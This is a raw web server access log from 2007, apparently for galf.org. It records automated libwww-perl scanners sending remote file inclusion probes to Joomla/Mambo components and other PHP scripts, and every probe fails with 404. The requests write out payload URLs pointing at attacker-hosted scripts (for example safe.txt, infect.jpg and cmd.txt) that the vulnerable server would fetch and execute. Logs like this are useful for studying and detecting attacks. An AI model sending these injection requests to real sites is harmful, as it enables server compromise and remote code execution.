200.57.31.22 - - [30/Sep/2007:19:17:41 -0700] "GET /index1.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.225.236.253 - - [30/Sep/2007:19:17:44 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tkj-amurang.biz/swing/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.225.236.253 - - [30/Sep/2007:19:17:44 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tkj-amurang.biz/swing/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:19:17:45 -0700] "GET /logs/index1.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.180.250.112 - - [30/Sep/2007:19:18:26 -0700] "GET /logs/access_070806.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
66.235.184.41 - - [30/Sep/2007:19:18:30 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
66.235.184.41 - - [30/Sep/2007:19:18:30 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
66.235.184.41 - - [30/Sep/2007:19:18:30 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.235.184.41 - - [30/Sep/2007:19:18:30 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:19:18:58 -0700] "GET /logs/access.log/index1.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.59.197.203 - - [30/Sep/2007:19:19:20 -0700] "GET /logs/index2.php?x=http://www.tryon.pagebr.com/fei/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.59.197.203 - - [30/Sep/2007:19:19:20 -0700] "GET /index2.php?x=http://www.tryon.pagebr.com/fei/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.214.59.8 - - [30/Sep/2007:19:19:34 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.59.8 - - [30/Sep/2007:19:19:34 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.59.8 - - [30/Sep/2007:19:19:34 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
85.214.59.8 - - [30/Sep/2007:19:19:35 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
200.57.31.22 - - [30/Sep/2007:19:21:30 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:19:21:35 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
200.57.31.22 - - [30/Sep/2007:19:21:50 -0700] "GET /logs/access_070910.log//modules/agendax/addevent.inc.php?agendax_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:19:21:56 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.149.196.76 - - [30/Sep/2007:19:22:26 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.149.196.76 - - [30/Sep/2007:19:22:26 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.214.59.8 - - [30/Sep/2007:19:22:56 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ilegais.110mb.com/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.59.8 - - [30/Sep/2007:19:22:56 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ilegais.110mb.com/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.59.8 - - [30/Sep/2007:19:23:00 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ilegais.110mb.com/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
85.214.59.8 - - [30/Sep/2007:19:23:00 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ilegais.110mb.com/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
216.180.243.82 - - [30/Sep/2007:19:23:23 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.149.196.76 - - [30/Sep/2007:19:23:23 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.149.196.76 - - [30/Sep/2007:19:23:23 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.180.243.82 - - [30/Sep/2007:19:23:30 -0700] "GET /logs/access_070806.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.180.243.82 - - [30/Sep/2007:19:23:32 -0700] "GET /logs/access_070611.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.180.243.82 - - [30/Sep/2007:19:23:32 -0700] "GET /logs/access_070910.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.180.243.82 - - [30/Sep/2007:19:23:34 -0700] "GET /logs/access_070827.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.180.243.82 - - [30/Sep/2007:19:23:34 -0700] "GET /logs/access_070702.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.158.100 - - [30/Sep/2007:19:23:44 -0700] "GET /logs/announcements.php?phpraid_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.158.100 - - [30/Sep/2007:19:23:44 -0700] "GET /announcements.php?phpraid_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.149.196.76 - - [30/Sep/2007:19:23:48 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
62.149.196.76 - - [30/Sep/2007:19:23:48 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.60.80.10 - - [30/Sep/2007:19:24:15 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
202.60.80.10 - - [30/Sep/2007:19:24:15 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:19:24:20 -0700] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:19:24:20 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.180.243.82 - - [30/Sep/2007:19:24:26 -0700] "GET /logs/access_070618.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.180.243.82 - - [30/Sep/2007:19:25:24 -0700] "GET /logs/access_070604.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.180.243.82 - - [30/Sep/2007:19:25:24 -0700] "GET /logs/access_070716.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.95.160.154 - - [30/Sep/2007:19:25:37 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.801"
80.95.160.154 - - [30/Sep/2007:19:25:37 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "galf.org"
216.180.243.82 - - [30/Sep/2007:19:25:42 -0700] "GET /logs/access_070625.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.180.243.82 - - [30/Sep/2007:19:25:42 -0700] "GET /logs/access_070820.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.180.243.82 - - [30/Sep/2007:19:25:50 -0700] "GET /logs/access_070709.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.180.243.82 - - [30/Sep/2007:19:26:03 -0700] "GET /logs/access_070826.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.180.243.82 - - [30/Sep/2007:19:26:17 -0700] "GET /logs/access_070723.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
80.95.160.154 - - [30/Sep/2007:19:26:18 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.galf.org"
80.95.160.154 - - [30/Sep/2007:19:26:18 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.galf.org"
202.60.80.10 - - [30/Sep/2007:19:26:32 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.80.10 - - [30/Sep/2007:19:26:32 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.242.108.70 - - [30/Sep/2007:19:26:43 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.242.108.70 - - [30/Sep/2007:19:26:44 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.95.160.154 - - [30/Sep/2007:19:26:50 -0700] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.galf.org"
80.95.160.154 - - [30/Sep/2007:19:26:50 -0700] "GET //include/main.php?config[search_disp]=true&include_dir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.galf.org"
62.149.196.76 - - [30/Sep/2007:19:27:04 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.149.196.76 - - [30/Sep/2007:19:27:04 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.214.59.8 - - [30/Sep/2007:19:27:08 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.59.8 - - [30/Sep/2007:19:27:08 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.235.184.41 - - [30/Sep/2007:19:27:50 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
66.235.184.41 - - [30/Sep/2007:19:27:51 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
216.180.243.82 - - [30/Sep/2007:19:27:52 -0700] "GET /logs/access_070910.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
62.149.196.76 - - [30/Sep/2007:19:28:16 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.149.196.76 - - [30/Sep/2007:19:28:16 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
85.214.59.8 - - [30/Sep/2007:19:29:15 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ilegais.110mb.com/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.59.8 - - [30/Sep/2007:19:29:16 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ilegais.110mb.com/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.235.184.41 - - [30/Sep/2007:19:29:44 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
66.235.184.41 - - [30/Sep/2007:19:29:44 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
64.72.112.111 - - [30/Sep/2007:19:30:00 -0700] "GET /logs/access_070625.log/voir.php?inc=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
195.42.160.22 - - [30/Sep/2007:19:30:02 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "galf.org"
195.42.160.22 - - [30/Sep/2007:19:30:03 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "galf.org"
64.72.112.111 - - [30/Sep/2007:19:30:05 -0700] "GET /voir.php?inc=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
64.72.112.111 - - [30/Sep/2007:19:30:05 -0700] "GET /logs/voir.php?inc=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.235.184.41 - - [30/Sep/2007:19:31:37 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.149.196.76 - - [30/Sep/2007:19:32:05 -0700] "GET /logs/announcements.php?phpraid_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.149.196.76 - - [30/Sep/2007:19:32:10 -0700] "GET /announcements.php?phpraid_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.235.184.41 - - [30/Sep/2007:19:32:47 -0700] "GET /logs/components/com_jim/install.jim.php?mosConfig_absolute_path=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.235.184.41 - - [30/Sep/2007:19:32:47 -0700] "GET /components/com_jim/install.jim.php?mosConfig_absolute_path=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.214.20.213 - - [30/Sep/2007:19:33:03 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.20.213 - - [30/Sep/2007:19:33:03 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
59.105.190.105 - - [30/Sep/2007:19:33:27 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://search-engineoptimization.biz/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
59.105.190.105 - - [30/Sep/2007:19:33:27 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://search-engineoptimization.biz/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
66.235.184.41 - - [30/Sep/2007:19:33:34 -0700] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.235.184.41 - - [30/Sep/2007:19:33:52 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.235.184.41 - - [30/Sep/2007:19:33:52 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:19:35:08 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.12.114.142 - - [30/Sep/2007:19:36:14 -0700] "GET /logs/access_070910.log/index.php?get=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.12.114.142 - - [30/Sep/2007:19:36:14 -0700] "GET /logs/index.php?get=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:19:36:26 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:19:36:26 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:19:36:26 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:19:37:15 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:19:37:16 -0700] "GET /logs/access_070716.log/index.php?go=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:19:37:16 -0700] "GET /index.php?go=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:19:37:17 -0700] "GET /logs/index.php?go=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
64.14.74.20 - - [30/Sep/2007:19:38:14 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.flylink.psi.br/arquivos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.14.74.20 - - [30/Sep/2007:19:38:14 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.flylink.psi.br/arquivos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:19:38:16 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
193.242.108.70 - - [30/Sep/2007:19:38:26 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.242.108.70 - - [30/Sep/2007:19:38:26 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
203.255.227.30 - - [30/Sep/2007:19:40:22 -0700] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:19:40:23 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:19:40:23 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:19:40:24 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
200.57.31.22 - - [30/Sep/2007:19:40:28 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
195.42.160.22 - - [30/Sep/2007:19:40:36 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
